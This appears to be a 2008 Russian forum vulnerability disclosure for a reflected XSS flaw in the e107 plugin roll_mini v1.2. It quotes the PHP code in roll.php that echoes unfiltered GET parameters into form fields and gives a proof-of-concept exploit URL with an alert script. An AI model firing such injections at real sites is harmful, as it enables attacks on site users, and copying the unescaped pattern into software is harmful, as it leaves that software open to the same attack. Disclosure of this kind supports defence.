15.12.2008, 00:32
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
e107 roll_mini v1.2 (каталог терминов) XSS
http://e107.org.ru/download.php?view.221
Уязвимый продукт: roll_mini (каталог терминов)
Версия: v1.2
Условия: magic quotes off
1. XSS
Уязвимость в файле roll.php
Уязвимый кусок кода:
PHP код:
if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";
if ($_GET['search']) $search = $_GET['search'];
.........
<input class='tbox' type='hidden' name='cat' size='30' value='".$id_cat."' >
<input class='tbox' type='text' name='search' size='30' value='".$search."' >
xss атаку можна произвести из за отсуствия фильтации в файле roll.php
Exploit:
/e107_plugins/roll_mini/roll.php?cat=1aaaa<script>alert('xss')</script>
|
|
|